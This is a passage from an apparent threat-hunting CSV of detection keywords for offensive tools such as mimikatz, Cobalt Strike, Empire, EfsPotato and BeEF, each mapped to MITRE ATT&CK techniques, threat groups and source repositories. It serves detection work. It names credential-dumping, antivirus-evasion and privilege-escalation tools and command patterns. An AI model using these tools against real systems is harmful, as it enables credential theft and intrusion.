and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*crypto::certtohw*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*crypto::cng*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*crypto::extract*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*crypto::hash*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*crypto::keys*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*crypto::providers*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*crypto::sc*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*crypto::scauth*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*crypto::stores*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*crypto::system*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*crypto::tpminfo*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*crypto_identifier*,offensive_tool_keyword,crypto_identifier,Crypto tool for pentest and ctf : try to uncipher data using multiple algorithms and block chaining modes. Usefull for a quick check on unknown cipher text and key dictionary,T1573 - T1558 - T1112,TA0001,N/A,N/A,Exploitation tools,https://github.com/Acceis/crypto_identifier,1,1,N/A,N/A,2,116,26,2018-01-04T11:04:56Z,2017-11-30T13:04:49Z -*cryptvortex *,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*cs2modrewrite.py*,offensive_tool_keyword,cobaltstrike,Convert Cobalt Strike profiles to modrewrite scripts,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 
- T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/cs2modrewrite,1,1,N/A,10,10,553,114,2023-01-30T17:47:51Z,2017-06-06T14:53:57Z -*cs2nginx.py*,offensive_tool_keyword,cobaltstrike,Convert Cobalt Strike profiles to modrewrite scripts,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/cs2modrewrite,1,1,N/A,10,10,553,114,2023-01-30T17:47:51Z,2017-06-06T14:53:57Z -*csandker/Azure-AccessPermissions*,offensive_tool_keyword,Azure-AccessPermissions,Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.,T1087.002 - T1018 - T1069.002,TA0007 - 
TA0009,N/A,N/A,AD Enumeration,https://github.com/csandker/Azure-AccessPermissions,1,1,N/A,6,1,90,16,2023-02-21T06:46:24Z,2022-10-19T10:33:24Z -*CS-Avoid-killing*,offensive_tool_keyword,cobaltstrike,CS anti-killing including python version and C version,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Gality369/CS-Loader,1,1,N/A,10,10,751,149,2021-08-11T06:43:52Z,2020-08-17T21:33:06Z -*CS-BOFs/lsass*,offensive_tool_keyword,cobaltstrike,Collection of CobaltStrike beacon object files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - 
T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/pwn1sher/CS-BOFs,1,1,N/A,10,10,100,23,2022-02-14T09:47:30Z,2021-01-18T08:54:48Z -*csc.exe /t:exe /out:RandomName.exe Program.cs*,offensive_tool_keyword,NetLoader,Loads any C# binary in memory - patching AMSI + ETW,T1055.012 - T1112 - T1562.001,TA0005 - TA0002,N/A,N/A,Exploitation tools - Defense Evasion,https://github.com/Flangvik/NetLoader,1,0,N/A,10,7,684,139,2021-10-03T16:41:03Z,2020-05-05T15:20:16Z -*csc.exe EfsPotato.cs *,offensive_tool_keyword,EfsPotato,Exploit for EfsPotato(MS-EFSR EfsRpcOpenFileRaw with SeImpersonatePrivilege local privalege escalation vulnerability),T1068 - T1055.002 - T1070.004,TA0003 - TA0005 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/zcgonvh/EfsPotato,1,1,N/A,10,7,613,114,2023-06-01T15:03:53Z,2021-07-26T21:36:16Z -*cscript *wmi.vbs -h*,offensive_tool_keyword,Earth Lusca Operations Tools,Earth Lusca Operations Tools and commands,T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005,TA0001 - TA0002 - TA0003,cobaltstrike - mimikatz - powersploit - shadowpad - winnti,Earth Lusca,Exploitation 
tools,https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*cscript ..\\temp.vbs*,offensive_tool_keyword,365-Stealer,365-Stealer is a phishing simualtion tool written in python3. It can be used to execute Illicit Consent Grant Attack,T1111 - T1566.001 - T1078.004,TA0004 - TA0001 - TA0040,N/A,N/A,Phishing,https://github.com/AlteredSecurity/365-Stealer,1,0,N/A,10,3,288,74,2023-06-15T19:56:12Z,2020-09-20T18:22:36Z -*cscript dl.vbs *http*/*.zip*.zip*,offensive_tool_keyword,Windows-Privilege-Escalation,Windows Privilege Escalation Techniques and Scripts,T1055 - T1548 - T1078,TA0004 - TA0005 - TA0040,N/A,N/A,Privilege Escalation,https://github.com/frizb/Windows-Privilege-Escalation,1,0,N/A,N/A,8,710,185,2020-03-25T22:35:02Z,2017-05-12T13:09:50Z -*CsEnox/SeManageVolumeExploit*,offensive_tool_keyword,SeManageVolumeExploit,This exploit grants full permission on C:\ drive for all users on the machine,T1046 - T1098 - T1222.002,TA0007 - TA0005 - TA0040,N/A,N/A,Privilege Escalation,https://github.com/CsEnox/SeManageVolumeExploit,1,1,N/A,10,1,44,13,2023-05-29T05:41:16Z,2021-10-11T01:17:04Z -*csexec/csexec_history*,offensive_tool_keyword,CSExec,An alternative to *exec.py from impacket with some builtin tricks,T1059.001 - T1059.005 - T1071.001,TA0002,N/A,N/A,Lateral Movement,https://github.com/Metro-Holografix/CSExec.py,1,0,private github repo,10,,N/A,,, -*csharp_inject_bof_inject*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - 
T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,1,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*CSharpNamedPipeLoader*,offensive_tool_keyword,cobaltstrike,LiquidSnake is a tool that allows operators to perform fileless lateral movement using WMI Event Subscriptions and GadgetToJScript,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera 
- APT29,C2,https://github.com/RiccardoAncarani/LiquidSnake,1,1,N/A,10,10,306,47,2021-09-01T11:53:30Z,2021-08-31T12:23:01Z -*csload.net/*/muma.*,offensive_tool_keyword,cobaltstrike,A cobaltstrike shellcode loader - past domestic mainstream antivirus software,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/YDHCUI/csload.net,1,1,N/A,10,10,123,13,2021-05-21T02:36:03Z,2021-05-20T08:24:16Z -*csOnvps*teamserver*,offensive_tool_keyword,cobaltstrike,CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. 
to solve the problem that cs4.x cannot run on Linux and report errors,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/AlphabugX/csOnvps,1,1,N/A,10,10,277,68,2022-03-19T00:10:03Z,2021-12-02T02:10:42Z -*cSploit-*.apk*,offensive_tool_keyword,csploit,The most complete and advanced IT security professional toolkit on Android.,T1555 - T1569 - T1210,TA0002 - TA0003 - TA0009,N/A,N/A,Frameworks,https://github.com/cSploit/android,1,1,N/A,N/A,10,3108,1130,2022-09-02T00:16:04Z,2014-10-04T05:53:29Z -*cSploit/android*,offensive_tool_keyword,csploit,The most complete and advanced IT security professional toolkit on Android.,T1555 - T1569 - T1210,TA0002 - TA0003 - TA0009,N/A,N/A,Frameworks,https://github.com/cSploit/android,1,1,N/A,N/A,10,3108,1130,2022-09-02T00:16:04Z,2014-10-04T05:53:29Z -*csprecon -*,offensive_tool_keyword,thoth,Automate recon for red team assessments.,T1190 - T1083 - T1018,TA0007 - TA0043 - TA0001,N/A,N/A,Reconnaissance,https://github.com/r1cksec/thoth,1,0,N/A,7,1,75,8,2023-09-27T06:46:46Z,2021-11-15T13:40:56Z 
-*CS-Remote-OPs-BOF*,offensive_tool_keyword,cobaltstrike,Cobaltstrike Bofs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,1,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z -*csrf_to_beef*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*CSSG_load.cna*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Shellcode Generator,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/RCStep/CSSG,1,1,N/A,10,10,554,107,2023-09-07T19:41:31Z,2021-01-12T14:39:06Z -*cs-token-vault.git*,offensive_tool_keyword,cobaltstrike,In-memory token vault BOF 